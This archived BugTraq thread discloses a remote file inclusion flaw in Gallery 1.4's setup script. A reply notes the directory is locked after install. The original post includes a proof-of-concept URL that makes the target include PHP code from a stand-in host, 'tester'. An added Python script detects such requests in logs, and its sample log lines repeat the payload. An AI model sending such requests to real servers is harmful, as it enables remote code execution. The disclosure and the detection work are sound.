BugTraq
Gallery 1.4 including file vulnerability Oct 11 2003 04:13PM
Peter Stöckli (pcs rootquest com) (2 replies)
Re: Gallery 1.4 including file vulnerability Oct 12 2003 05:53AM
Bharat Mediratta (bharat menalto com)
RE: Gallery 1.4 including file vulnerability Oct 11 2003 06:41PM
Brent Meshier (brent meshier com)
The URL you mention is accessible only during the setup of Gallery.
Completing the installation, the user runs secure.sh or secure.bat which
"chmod 0 setup" making the vulnerability you mention inaccessible to the
web.

Brent Meshier
Global Transport Logistics, Inc.
2770 Fortune Circle Drive
Indianapolis, IN 46241
(317) 481-0527 x23 Direct
(317) 481-0177 Fax
http://www.gtlogistics.com/

-----Original Message-----
From: Peter Stöckli [mailto:pcs (at) rootquest (dot) com]
Sent: Saturday, October 11, 2003 11:13 AM
To: bugtraq (at) securityfocus (dot) com
Subject: Gallery 1.4 including file vulnerability

-Proof of concept-
It is possible to include any php file from a remote host, and execute
it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php" exists, it will be included.
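
Added example, not part of the original posts and not Gallery's own code: a Python sketch that scans web server access logs for requests passing GALLERY_BASEDIR as a remote URL, as in the proof of concept above, and reports the response status so an analyst can see whether the setup directory was still being served. The log lines, client addresses, log format and function name are constructed assumptions; only query-string parameters are visible in such logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache common log format (addresses and paths are made up).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Oct/2003:09:14:02 +0000] "GET /gallery/setup/index.php HTTP/1.1" 200 5120
192.0.2.44 - - [12/Oct/2003:09:15:40 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ HTTP/1.1" 200 312
192.0.2.44 - - [12/Oct/2003:09:15:58 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http%3A%2F%2Ftester%2F HTTP/1.1" 403 210
192.0.2.77 - - [12/Oct/2003:09:20:11 +0000] "GET /gallery/albums.php?set_albumName=holiday HTTP/1.1" 200 8841
192.0.2.80 - - [12/Oct/2003:09:21:30 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=/var/www/gallery/ HTTP/1.1" 200 5120
"""

# client, identd, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A value that names another host: "scheme://..." or protocol-relative "//..."
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)


def find_remote_basedir(log_text):
    """Return (client, status, value) for each request whose query string
    sets GALLERY_BASEDIR to a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, _method, target, status = m.groups()
        # parse_qsl percent-decodes, so encoded variants are caught too
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name == "GALLERY_BASEDIR" and REMOTE_RE.match(value):
                hits.append((client, int(status), value))
    return hits


if __name__ == "__main__":
    for client, status, value in find_remote_basedir(SAMPLE_LOG):
        # Assumption: a 200 means setup/ was still served; a 403 suggests it was locked down.
        state = "setup/ reachable" if status == 200 else "request refused"
        print(f"{client} status={status} ({state}) GALLERY_BASEDIR={value}")
```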

Copyright 2010, SecurityFocus